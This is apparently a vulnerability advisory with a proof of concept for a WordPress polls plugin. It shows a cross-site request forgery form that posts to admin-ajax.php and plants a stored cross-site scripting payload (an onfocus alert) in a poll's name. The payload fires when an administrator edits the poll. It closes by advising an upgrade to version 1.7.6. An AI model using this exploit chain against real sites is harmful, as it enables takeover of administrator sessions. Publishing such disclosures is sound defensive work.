Proof of concept
Create a poll. We assume that the ID of this poll will be 1.
Visit the following page and click submit (in a real attack the form can be submitted without user interaction):
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php"> <input type="text" name="poll_id" value="1"> <input type="text" name="action" value="update_poll"> <input type="text" name="name" value="" onfocus="alert(1)"> <input type="submit"> </form>
Then visit http://localhost/wp-admin/admin.php?page=polls&action=edit&edit_poll=1 and focus the Question field (either via clicking on it or tabbing to it).
Upgrade to version 1.7.6 or later.